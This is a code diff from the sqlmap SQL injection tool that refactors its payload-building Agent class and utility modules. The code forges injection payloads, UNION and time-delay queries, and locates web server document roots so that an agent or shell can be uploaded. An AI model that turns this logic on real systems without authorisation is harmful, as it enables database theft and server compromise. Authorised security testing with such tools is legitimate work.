 class Agent:
@@ -46,7 +44,6 @@ class Agent:
         temp.start     = randomStr(6)
         temp.stop      = randomStr(6)
 
-
     def payload(self, place=None, parameter=None, value=None, newValue=None, negative=False, falseCond=False):
         """
         This method replaces the affected parameter with the SQL
@@ -56,10 +53,11 @@ class Agent:
         falseValue = ""
         negValue   = ""
         retValue   = ""
+        newValue   = urlencode(newValue)
 
-        if negative == True or conf.paramNegative == True:
+        if negative or conf.paramNegative:
             negValue = "-"
-        elif falseCond == True or conf.paramFalseCond == True:
+        elif falseCond or conf.paramFalseCond:
             randInt = randomInt()
             falseValue = " AND %d=%d" % (randInt, randInt + 1)
 
@@ -84,7 +82,6 @@ class Agent:
 
         return retValue
 
-
     def fullPayload(self, query):
         query   = self.prefixQuery(query)
         query   = self.postfixQuery(query)
@@ -92,7 +89,6 @@ class Agent:
 
         return payload
 
-
     def prefixQuery(self, string):
         """
         This method defines how the input string has to be escaped
@@ -121,7 +117,6 @@ class Agent:
 
         return query
 
-
     def postfixQuery(self, string, comment=None):
         """
         This method appends the DBMS comment to the
@@ -137,7 +132,7 @@ class Agent:
         if conf.postfix:
             string += " %s" % conf.postfix
         else:
-            if kb.parenthesis != None:
+            if kb.parenthesis is not None:
                 string += " AND %s" % ("(" * kb.parenthesis)
             else:
                 raise sqlmapNoneDataException, "unable to get the number of parenthesis"
@@ -157,7 +152,6 @@ class Agent:
 
         return string
 
-
     def nullAndCastField(self, field):
         """
         Take in input a field string and return its processed nulled and
@@ -196,7 +190,6 @@ class Agent:
 
         return nulledCastedField
 
-
     def nullCastConcatFields(self, fields):
         """
         Take in input a sequence of fields string and return its processed
@@ -243,7 +236,6 @@ class Agent:
 
         return nulledCastedConcatFields
 
-
     def getFields(self, query):
         """
         Take in input a query string and return its fields (columns) and
@@ -284,13 +276,8 @@ class Agent:
         fieldsToCastList = fieldsToCastStr.replace(", ", ",")
         fieldsToCastList = fieldsToCastList.split(",")
 
-        # TODO: really needed?!
-        #if query.startswith("SELECT ") and "(SELECT " in query:
-        #    fieldsSelectFrom = None
-
         return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, fieldsToCastList, fieldsToCastStr
 
-
     def simpleConcatQuery(self, query1, query2):
         concatenatedQuery = ""
 
@@ -305,7 +292,6 @@ class Agent:
 
         return concatenatedQuery
 
-
     def concatQuery(self, query, unpack=True):
         """
         Take in input a query string and return its processed nulled,
@@ -332,7 +318,7 @@ class Agent:
         @rtype: C{str}
         """
 
-        if unpack == True:
+        if unpack:
             concatenatedQuery = ""
             query             = query.replace(", ", ",")
 
@@ -391,7 +377,6 @@ class Agent:
 
         return concatenatedQuery
 
-
     def forgeInbandQuery(self, query, exprPosition=None, nullChar="NULL"):
         """
         Take in input an query (pseudo query) string and return its
@@ -470,8 +455,7 @@ class Agent:
 
         return inbandQuery
 
-
-    def limitQuery(self, num, query, field):
+    def limitQuery(self, num, query, field=None):
         """
         Take in input a query string and return its limited query string.
 
@@ -520,6 +504,12 @@ class Agent:
             if " ORDER BY " in limitedQuery:
                 limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
 
+            notDistincts = re.findall("DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
+
+            for notDistinct in notDistincts:
+                limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
+                limitedQuery = limitedQuery.replace("DISTINCT %s" % notDistinct, notDistinct)
+
             if limitedQuery.startswith("SELECT TOP ") or limitedQuery.startswith("TOP "):
                 topNums         = re.search(queries[kb.dbms].limitregexp, limitedQuery, re.I)
 
@@ -534,18 +524,19 @@ class Agent:
                     topNum          = re.search("TOP\s+([\d]+)\s+", limitedQuery, re.I).group(1)
                     limitedQuery    = limitedQuery.replace("TOP %s " % topNum, "")
 
-            if forgeNotIn == True:
+            if forgeNotIn:
                 limitedQuery = limitedQuery.replace("SELECT ", (limitStr % 1), 1)
+
                 if " WHERE " in limitedQuery:
                     limitedQuery  = "%s AND %s " % (limitedQuery, field)
                 else:
                     limitedQuery  = "%s WHERE %s " % (limitedQuery, field)
+
                 limitedQuery += "NOT IN (%s" % (limitStr % num)
                 limitedQuery += "%s %s)" % (field, fromFrom)
 
         return limitedQuery
 
-
     def forgeCaseStatement(self, expression):
         """
         Take in input a query string and return its CASE statement query
@@ -565,6 +556,5 @@ class Agent:
 
         return queries[kb.dbms].case % expression
 
-
 # SQL agent
 agent = Agent()

lib/core/common.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import os
 import random
 import re
@@ -32,21 +30,30 @@ import string
 import sys
 import time
 import urlparse
+import ntpath
+import posixpath
 
+from tempfile import NamedTemporaryFile
+from tempfile import mkstemp
 
+from extra.cloak.cloak import decloak
 from lib.contrib import magic
-from lib.core.convert import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.data import queries
 from lib.core.data import temp
+from lib.core.convert import urlencode
 from lib.core.exception import sqlmapFilePathException
+from lib.core.exception import sqlmapNoneDataException
+from lib.core.exception import sqlmapSyntaxException
+from lib.core.settings import DESCRIPTION
+from lib.core.settings import IS_WIN
+from lib.core.settings import SITE
 from lib.core.settings import SQL_STATEMENTS
 from lib.core.settings import VERSION_STRING
 
-
 def paramToDict(place, parameters=None):
     """
     Split the parameters into names and values, check if these parameters
@@ -86,7 +93,6 @@ def paramToDict(place, parameters=None):
 
             if condition:
                 value = elem[1]
-                if value:
                 testableParameters[parameter] = value
 
     if conf.testParameter and not testableParameters:
@@ -115,7 +121,6 @@ def paramToDict(place, parameters=None):
 
     return testableParameters
 
-
 def formatDBMSfp(versions=None):
     """
     This function format the back-end DBMS fingerprint value and return its
@@ -125,7 +130,7 @@ def formatDBMSfp(versions=None):
     @rtype: C{str}
     """
 
-    if not versions:
+    if not versions or versions == [None]:
         versions = kb.dbmsVersion
 
     if isinstance(versions, str):
@@ -139,12 +144,10 @@ def formatDBMSfp(versions=None):
 
         return kb.dbms
 
-
 def formatFingerprintString(values, chain=" or "):
-    string = "|".join([v for v in values])
-
-    return string.replace("|", chain)
+    strJoin = "|".join([v for v in values])
 
+    return strJoin.replace("|", chain)
 
 def formatFingerprint(target, info):
     """
@@ -198,7 +201,6 @@ def formatFingerprint(target, info):
 
     return infoStr
 
-
 def getHtmlErrorFp():
     """
     This function parses the knowledge base htmlFp list and return its
@@ -222,82 +224,115 @@ def getHtmlErrorFp():
 
     return htmlParsed
 
-
-def getDocRoot():
-    """
-    This method returns the web application document root based on the
-    detected absolute files paths in the knowledge base.
-    """
-
+def getDocRoot(webApi=None):
     docRoot = None
+    pagePath = directoryPath(conf.path)
+
+    if kb.os == "Windows":
+        if webApi == "php":
+            defaultDocRoot = "C:/xampp/htdocs/"
+        else:
+            defaultDocRoot = "C:/Inetpub/wwwroot/"
+    else:
+        defaultDocRoot = "/var/www/"
 
     if kb.absFilePaths:
-        logMsg  = "retrieved the possible injectable "
-        logMsg += "file absolute system paths: "
-        logMsg += "'%s'" % ", ".join(path for path in kb.absFilePaths)
-        logger.info(logMsg)
-    else:
-        warnMsg  = "unable to retrieve the injectable file "
-        warnMsg += "absolute system path"
-        logger.warn(warnMsg)
-
         for absFilePath in kb.absFilePaths:
-        if conf.path in absFilePath:
-            index = absFilePath.index(conf.path)
+            if directoryPath(absFilePath) == '/':
+                continue
+            absFilePath = normalizePath(absFilePath)
+            absFilePathWin = None
+
+            if isWindowsPath(absFilePath):
+                absFilePathWin = posixToNtSlashes(absFilePath)
+                absFilePath    = ntToPosixSlashes(absFilePath[2:])
+            
+            if pagePath in absFilePath:
+                index   = absFilePath.index(pagePath)
                 docRoot = absFilePath[:index]
+
+                if len(docRoot) == 0:
+                    docRoot = None
+                    continue
+
+                if absFilePathWin:
+                    docRoot = "C:/%s" % ntToPosixSlashes(docRoot)
+                    
+                docRoot = normalizePath(docRoot)
                 break
 
     if docRoot:
-        logMsg  = "retrieved the remote web server "
-        logMsg += "document root: '%s'" % docRoot
-        logger.info(logMsg)
+        infoMsg = "retrieved the web server document root: '%s'" % docRoot
+        logger.info(infoMsg)
     else:
-        warnMsg  = "unable to retrieve the remote web server "
-        warnMsg += "document root"
+        warnMsg = "unable to retrieve the web server document root"
         logger.warn(warnMsg)
 
+        message  = "please provide the web server document root "
+        message += "[%s]: " % defaultDocRoot
+        inputDocRoot = readInput(message, default=defaultDocRoot)
+
+        if inputDocRoot:
+            docRoot = inputDocRoot
+        else:
+            docRoot = defaultDocRoot
+
     return docRoot
 
-
-def getDirectories():
-    """
-    This method calls a function that returns the web application document
-    root and injectable file absolute system path.
-
-    @return: a set of paths (document root and absolute system path).
-    @rtype: C{set}
-    @todo: replace this function with a site crawling functionality.
-    """
-
+def getDirs(webApi=None):
     directories = set()
 
-    kb.docRoot = getDocRoot()
+    if kb.os == "Windows":
+        if webApi == "php":
+            defaultDirs = ["C:/xampp/htdocs/"]
+        else:
+            defaultDirs = ["C:/Inetpub/wwwroot/"]
+    else:
+        defaultDirs = ["/var/www/"]
 
-    if kb.docRoot:
-        directories.add(kb.docRoot)
+    if kb.absFilePaths:
+        infoMsg  = "retrieved web server full paths: "
+        infoMsg += "'%s'" % ", ".join(path for path in kb.absFilePaths)
+        logger.info(infoMsg)
         
-    pagePath = re.search("^/(.*)/", conf.path)
+        for absFilePath in kb.absFilePaths:
+            if absFilePath:
+                directory = directoryPath(absFilePath)
+                if isWindowsPath(directory):
+                    directory = directory.replace('\\', '/')
+                if directory == '/':
+                    continue
+                directories.add(directory)
+    else:
+        warnMsg = "unable to retrieve any web server path"
+        logger.warn(warnMsg)
 
-    if kb.docRoot and pagePath:
-        pagePath = pagePath.groups()[0]
+    message   = "please provide any additional web server full path to try "
+    message  += "to upload the agent [%s]: " % ",".join(directory for directory in defaultDirs)
+    inputDirs = readInput(message, default=",".join(directory for directory in defaultDirs))
 
-        directories.add("%s/%s" % (kb.docRoot, pagePath))
+    if inputDirs:
+        inputDirs = inputDirs.replace(", ", ",")
+        inputDirs = inputDirs.split(",")
+
+        for inputDir in inputDirs:
+            if inputDir:
+                directories.add(inputDir)
+    else:
+        [directories.add(directory) for directory in defaultDirs]
 
     return directories
     
-
 def filePathToString(filePath):
-    string = filePath.replace("/", "_").replace("\\", "_")
-    string = string.replace(" ", "_").replace(":", "_")
-
-    return string
+    strRepl = filePath.replace("/", "_").replace("\\", "_")
+    strRepl = strRepl.replace(" ", "_").replace(":", "_")
 
+    return strRepl
 
 def dataToStdout(data):
     sys.stdout.write(data)
     sys.stdout.flush()
     
-
 def dataToSessionFile(data):
     if not conf.sessionFile:
         return
@@ -305,12 +340,10 @@ def dataToSessionFile(data):
     conf.sessionFP.write(data)
     conf.sessionFP.flush()
     
-
 def dataToDumpFile(dumpFile, data):
     dumpFile.write(data)
     dumpFile.flush()
     
-
 def dataToOutFile(data):
     if not data:
         return "No data retrieved"
@@ -325,19 +358,18 @@ def dataToOutFile(data):
 
     return rFilePath
 
-
-def strToHex(string):
+def strToHex(inpStr):
     """
-    @param string: string to be converted into its hexadecimal value.
-    @type string: C{str}
+    @param inpStr: inpStr to be converted into its hexadecimal value.
+    @type inpStr: C{str}
 
-    @return: the hexadecimal converted string.
+    @return: the hexadecimal converted inpStr.
     @rtype: C{str}
     """
 
     hexStr = ""
 
-    for character in string:
+    for character in inpStr:
         if character == "\n":
             character = " "
 
@@ -349,7 +381,6 @@ def strToHex(string):
 
     return hexStr
         
-
 def fileToStr(fileName):
     """
     @param fileName: file path to read the content and return as a no
@@ -363,13 +394,7 @@ def fileToStr(fileName):
     filePointer = open(fileName, "r")
     fileText = filePointer.read()
 
-    fileText = fileText.replace("    ", "")
-    fileText = fileText.replace("\t", "")
-    fileText = fileText.replace("\r", "")
-    fileText = fileText.replace("\n", " ")
-
-    return fileText
-
+    return fileText.replace("    ", "").replace("\t", "").replace("\r", "").replace("\n", " ")
 
 def fileToHex(fileName):
     """
@@ -386,7 +411,6 @@ def fileToHex(fileName):
 
     return hexFile
 
-
 def readInput(message, default=None):
     """
     @param message: message to display on terminal.
@@ -410,8 +434,10 @@ def readInput(message, default=None):
     else:
         data = raw_input(message)
 
-    return data
+        if not data:
+            data = default
 
+    return data
         
 def randomRange(start=0, stop=1000):
     """
@@ -427,7 +453,6 @@ def randomRange(start=0, stop=1000):
 
     return int(random.randint(start, stop))
 
-
 def randomInt(length=4):
     """
     @param length: length of the random string.
@@ -439,8 +464,7 @@ def randomInt(length=4):
 
     return int("".join([random.choice(string.digits) for _ in xrange(0, length)]))
 
-
-def randomStr(length=5, lowercase=False):
+def randomStr(length=4, lowercase=False):
     """
     @param length: length of the random string.
     @type length: C{int}
@@ -449,30 +473,28 @@ def randomStr(length=5, lowercase=False):
     @rtype: C{str}
     """
 
-    if lowercase == True:
+    if lowercase:
         rndStr = "".join([random.choice(string.lowercase) for _ in xrange(0, length)])
     else:
         rndStr = "".join([random.choice(string.letters) for _ in xrange(0, length)])
 
     return rndStr
     
-
-def sanitizeStr(string):
+def sanitizeStr(inpStr):
     """
-    @param string: string to sanitize: cast to str datatype and replace
+    @param inpStr: inpStr to sanitize: cast to str datatype and replace
     newlines with one space and strip carriage returns.
-    @type string: C{str}
+    @type inpStr: C{str}
 
-    @return: sanitized string
+    @return: sanitized inpStr
     @rtype: C{str}
     """
 
-    cleanString = str(string)
+    cleanString = str(inpStr)
     cleanString = cleanString.replace("\n", " ").replace("\r", "")
 
     return cleanString
 
-
 def checkFile(filename):
     """
     @param filename: filename to check if it exists.
@@ -482,24 +504,21 @@ def checkFile(filename):
     if not os.path.exists(filename):
         raise sqlmapFilePathException, "unable to read file '%s'" % filename
     
-
-def replaceNewlineTabs(string):
-    replacedString = string.replace("\n", "__NEWLINE__").replace("\t", "__TAB__")
+def replaceNewlineTabs(inpStr):
+    replacedString = inpStr.replace("\n", "__NEWLINE__").replace("\t", "__TAB__")
     replacedString = replacedString.replace(temp.delimiter, "__DEL__")
 
     return replacedString
 
-
 def banner():
     """
     This function prints sqlmap banner with its version
     """
 
     print """
+    %s - %s
     %s
-    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
-    """ % VERSION_STRING
-
+    """ % (VERSION_STRING, DESCRIPTION, SITE)
     
 def parsePasswordHash(password):
     blank = " " * 8
@@ -519,7 +538,6 @@ def parsePasswordHash(password):
 
     return password
 
-
 def cleanQuery(query):
     upperQuery = query
 
@@ -533,31 +551,30 @@ def cleanQuery(query):
 
     return upperQuery
             
-
 def setPaths():
     # sqlmap paths
-    paths.SQLMAP_CONTRIB_PATH    = "%s/lib/contrib" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_SHELL_PATH      = "%s/shell" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_TXT_PATH        = "%s/txt" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_UDF_PATH        = "%s/udf" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_XML_PATH        = "%s/xml" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_XML_BANNER_PATH = "%s/banner" % paths.SQLMAP_XML_PATH
-    paths.SQLMAP_OUTPUT_PATH     = "%s/output" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_DUMP_PATH       = paths.SQLMAP_OUTPUT_PATH + "/%s/dump"
-    paths.SQLMAP_FILES_PATH      = paths.SQLMAP_OUTPUT_PATH + "/%s/files"
+    paths.SQLMAP_CONTRIB_PATH    = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "contrib")
+    paths.SQLMAP_SHELL_PATH      = os.path.join(paths.SQLMAP_ROOT_PATH, "shell")
+    paths.SQLMAP_TXT_PATH        = os.path.join(paths.SQLMAP_ROOT_PATH, "txt")
+    paths.SQLMAP_UDF_PATH        = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
+    paths.SQLMAP_XML_PATH        = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
+    paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
+    paths.SQLMAP_OUTPUT_PATH     = os.path.join(paths.SQLMAP_ROOT_PATH, "output")
+    paths.SQLMAP_DUMP_PATH       = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
+    paths.SQLMAP_FILES_PATH      = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
 
     # sqlmap files
-    paths.SQLMAP_HISTORY         = "%s/.sqlmap_history" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_CONFIG          = "%s/sqlmap-%s.conf" % (paths.SQLMAP_ROOT_PATH, randomStr())
-    paths.FUZZ_VECTORS           = "%s/fuzz_vectors.txt" % paths.SQLMAP_TXT_PATH
-    paths.ERRORS_XML             = "%s/errors.xml" % paths.SQLMAP_XML_PATH
-    paths.QUERIES_XML            = "%s/queries.xml" % paths.SQLMAP_XML_PATH
-    paths.GENERIC_XML            = "%s/generic.xml" % paths.SQLMAP_XML_BANNER_PATH
-    paths.MSSQL_XML              = "%s/mssql.xml" % paths.SQLMAP_XML_BANNER_PATH
-    paths.MYSQL_XML              = "%s/mysql.xml" % paths.SQLMAP_XML_BANNER_PATH
-    paths.ORACLE_XML             = "%s/oracle.xml" % paths.SQLMAP_XML_BANNER_PATH
-    paths.PGSQL_XML              = "%s/postgresql.xml" % paths.SQLMAP_XML_BANNER_PATH
-
+    paths.SQLMAP_HISTORY         = os.path.join(paths.SQLMAP_ROOT_PATH, ".sqlmap_history")
+    paths.SQLMAP_CONFIG          = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
+    paths.FUZZ_VECTORS           = os.path.join(paths.SQLMAP_TXT_PATH, "fuzz_vectors.txt")
+    paths.DETECTION_RULES_XML    = os.path.join(paths.SQLMAP_XML_PATH, "detection.xml")
+    paths.ERRORS_XML             = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
+    paths.QUERIES_XML            = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
+    paths.GENERIC_XML            = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
+    paths.MSSQL_XML              = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "mssql.xml")
+    paths.MYSQL_XML              = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "mysql.xml")
+    paths.ORACLE_XML             = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
+    paths.PGSQL_XML              = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
     
 def weAreFrozen():
     """
@@ -568,7 +585,6 @@ def weAreFrozen():
 
     return hasattr(sys, "frozen")
 
-
 def parseTargetUrl():
     """
     Parse target url and set some attributes into the configuration
@@ -592,18 +608,21 @@ def parseTargetUrl():
     conf.hostname  = __hostnamePort[0]
 
     if len(__hostnamePort) == 2:
+        try:
             conf.port = int(__hostnamePort[1])
+        except:
+            errMsg = "invalid target url"
+            raise sqlmapSyntaxException, errMsg
     elif conf.scheme == "https":
         conf.port = 443
     else:
         conf.port = 80
 
     if __urlSplit[3]:
-        conf.parameters["GET"] = urldecode(__urlSplit[3]).replace("%", "%%")
+        conf.parameters["GET"] = __urlSplit[3]
 
     conf.url = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, conf.path)
     
-
 def expandAsteriskForColumns(expression):
     # If the user provided an asterisk rather than the column(s)
     # name, sqlmap will retrieve the columns itself and reprocess
@@ -636,7 +655,6 @@ def expandAsteriskForColumns(expression):
 
     return expression
 
-
 def getRange(count, dump=False, plusOne=False):
     count      = int(count)
     indexRange = None
@@ -650,14 +668,13 @@ def getRange(count, dump=False, plusOne=False):
         if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
             limitStart = conf.limitStart
 
-    if kb.dbms == "Oracle" or plusOne == True:
+    if plusOne:
         indexRange = range(limitStart, limitStop + 1)
     else:
         indexRange = range(limitStart - 1, limitStop)
 
     return indexRange
     
-
 def parseUnionPage(output, expression, partial=False, condition=None, sort=True):
     data = []
 
@@ -672,7 +689,7 @@ def parseUnionPage(output, expression, partial=False, condition=None, sort=True)
 
         output = re.findall(regExpr, output, re.S)
 
-        if condition == None:
+        if condition is None:
             condition = (
                           kb.resumedQueries and conf.url in kb.resumedQueries.keys()
                           and expression in kb.resumedQueries[conf.url].keys()
@@ -708,18 +725,21 @@ def parseUnionPage(output, expression, partial=False, condition=None, sort=True)
 
     return data
 
-
-def getDelayQuery():
+def getDelayQuery(andCond=False):
     query = None
 
-    if kb.dbms in ( "MySQL", "PostgreSQL" ):
+    if kb.dbms in ("MySQL", "PostgreSQL"):
         if not kb.data.banner:
             conf.dbmsHandler.getVersionFromBanner()
 
         banVer = kb.bannerFp["dbmsVersion"]
 
-        if ( kb.dbms == "MySQL" and banVer >= "5.0.12" ) or ( kb.dbms == "PostgreSQL" and banVer >= "8.2" ):
+        if (kb.dbms == "MySQL" and banVer >= "5.0.12") or (kb.dbms == "PostgreSQL" and banVer >= "8.2"):
             query = queries[kb.dbms].timedelay % conf.timeSec
+
+            if kb.dbms == "MySQL" and andCond:
+                query = query.replace("SELECT ", "")
+
         else:
             query = queries[kb.dbms].timedelay2 % conf.timeSec
     else:
@@ -727,7 +747,6 @@ def getDelayQuery():
 
     return query
     
-
 def getLocalIP():
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((conf.hostname, conf.port))
@@ -736,11 +755,9 @@ def getLocalIP():
 
     return ip
 
-
 def getRemoteIP():
     return socket.gethostbyname(conf.hostname)
 
-
 def getFileType(filePath):
     try:
         magicFileType = magic.from_file(filePath)
@@ -752,7 +769,6 @@ def getFileType(filePath):
     else:
         return "binary"
     
-
 def pollProcess(process):
     while True:
         dataToStdout(".")
@@ -760,19 +776,20 @@ def pollProcess(process):
 
         returncode = process.poll()
 
-        if returncode != None:
+        if returncode is not None:
             if returncode == 0:
                 dataToStdout(" done\n")
-            else:
-                dataToStdout(" quit unexpectedly by signal %d\n" % returncode)
+            elif returncode < 0:
+                dataToStdout(" process terminated by signal %d\n" % returncode)
+            elif returncode > 0:
+                dataToStdout(" quit unexpectedly with return code %d\n" % returncode)
 
             break
             
-
 def getCharset(charsetType=None):
     asciiTbl = []
 
-    if charsetType == None:
+    if charsetType is None:
         asciiTbl = range(0, 128)
 
     # 0 or 1
@@ -806,3 +823,122 @@ def getCharset(charsetType=None):
         asciiTbl.extend(range(96, 123))
 
     return asciiTbl
+    
+def searchEnvPath(fileName):
+    envPaths = os.environ["PATH"]
+    result = None
+
+    if IS_WIN:
+        envPaths = envPaths.split(";")
+    else:
+        envPaths = envPaths.split(":")
+
+    for envPath in envPaths:
+        envPath = envPath.replace(";", "")
+        result = os.path.exists(os.path.normpath(os.path.join(envPath, fileName)))
+
+        if result:
+            break
+
+    return result
+
+def urlEncodeCookieValues(cookieStr):
+    if cookieStr:
+        result = ""
+        for part in cookieStr.split(';'):
+            index = part.find('=') + 1
+            if index > 0:
+                name = part[:index - 1].strip()
+                value = urlencode(part[index:], convall=True)
+                result += "; %s=%s" % (name, value)
+            elif part.strip().lower() != "secure":
+                result += "%s%s" % ("%3B", urlencode(part, convall=True))
+            else:
+                result += "; secure"
+        if result.startswith('; '):
+            result = result[2:]
+        elif result.startswith('%3B'):
+            result = result[3:]
+        return result
+    else:
+        return None
+
+def directoryPath(path):
+    retVal = None
+    if isWindowsPath(path):
+        retVal = ntpath.dirname(path)
+    else:
+        retVal = posixpath.dirname(path)
+    return retVal
+
+def normalizePath(path):
+    """
+    This function must be called only after posixToNtSlashes()
+    and ntToPosixSlashes()
+    """
+
+    retVal = None
+
+    if isWindowsPath(path):
+        retVal = ntpath.normpath(path)
+    else:
+        retVal = posixpath.normpath(path)
+
+    return retVal
+
+def safeStringFormat(formatStr, params):
+    retVal = formatStr.replace('%d', '%s')
+
+    if isinstance(params, str):
+        retVal = retVal.replace("%s", params)
+    else:
+        count = 0
+        index = 0
+
+        while index != -1:
+            index = retVal.find('%s')
+
+            if index != -1:
+                if count < len(params):
+                    retVal = retVal[:index] + str(params[count]) + retVal[index+2:]
+                else:
+                    raise sqlmapNoneDataException, "wrong number of parameters during string formatting"
+                count += 1
+
+    return retVal
+
+def sanitizeAsciiString(string):
+    return "".join(char if ord(char) < 128 else '?' for char in string)
+
+def decloakToNamedTemporaryFile(filepath, name=None):
+    retVal = NamedTemporaryFile()
+    def __del__():
+        try:
+            if hasattr(retVal, 'old_name'):
+                retVal.name = old_name
+            retVal.close()
+        except OSError:
+            pass
+    retVal.__del__ = __del__
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    if name:
+        retVal.old_name = retVal.name
+        retVal.name = name
+    return retVal
+
+def decloakToMkstemp(filepath, **kwargs):
+    name = mkstemp(**kwargs)[1]
+    retVal = open(name, 'w+b')
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    return retVal
+
+def isWindowsPath(filepath):
+    return re.search("\A[\w]\:\\\\", filepath) is not None
+
+def posixToNtSlashes(filepath):
+    return filepath.replace('/', '\\')
+
+def ntToPosixSlashes(filepath):
+    return filepath.replace('\\', '/')

lib/core/convert.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,26 +22,22 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
 try:
+    import hashlib
+except:
     import md5
     import sha
-except DeprecationWarning, _:
-    from hashlib import md5
-    from hashlib import sha
     
+import sys
 import struct
 import urllib
 
-
 def base64decode(string):
     return string.decode("base64")
 
-
 def base64encode(string):
     return string.encode("base64")[:-1]
 
-
 def hexdecode(string):
     string = string.lower()
 
@@ -50,44 +46,45 @@ def hexdecode(string):
 
     return string.decode("hex")
     
-
 def hexencode(string):
     return string.encode("hex")
 
-
 def md5hash(string):
+    if sys.modules.has_key('hashlib'):
+        return hashlib.md5(string).hexdigest()
+    else:
         return md5.new(string).hexdigest()
 
-
 def orddecode(string):
     packedString = struct.pack("!"+"I" * len(string), *string)
     return "".join([chr(char) for char in struct.unpack("!"+"I"*(len(packedString)/4), packedString)])
 
-
 def ordencode(string):
     return tuple([ord(char) for char in string])
 
-
 def sha1hash(string):
+    if sys.modules.has_key('hashlib'):
+        return hashlib.sha1(string).hexdigest()
+    else:
         return sha.new(string).hexdigest()
 
-
 def urldecode(string):
-    if not string:
-        return
+    result = None
     
-    doublePercFreeString = string.replace("%%", "__DPERC__")
-    unquotedString = urllib.unquote_plus(doublePercFreeString)
-    unquotedString = unquotedString.replace("__DPERC__", "%%")
-
-    return unquotedString
+    if string:
+        result = urllib.unquote_plus(string)
 
+    return result
 
 def urlencode(string, safe=":/?%&=", convall=False):
-    if not string:
-        return
+    result = None
 
-    if convall == True:
-        return urllib.quote(string)
+    if string is None:
+        return result
+
+    if convall:
+        result = urllib.quote(string)
     else:
-        return urllib.quote(string, safe)
+        result = urllib.quote(string, safe)
+
+    return result

lib/core/data.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.core.datatype import advancedDict
 from lib.core.settings import LOGGER
 

lib/core/datatype.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,10 +22,8 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
 from lib.core.exception import sqlmapDataException
 
-
 class advancedDict(dict):
     """
     This class defines the sqlmap object, inheriting from Python data
@@ -45,7 +43,6 @@ class advancedDict(dict):
         # After initialisation, setting attributes
         # is the same as setting an item
 
-
     def __getattr__(self, item):
         """
         Maps values to attributes
@@ -57,7 +54,6 @@ class advancedDict(dict):
         except KeyError:
             raise sqlmapDataException, "Unable to access item '%s'" % item
 
-
     def __setattr__(self, item, value):
         """
         Maps attributes to values

lib/core/dump.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
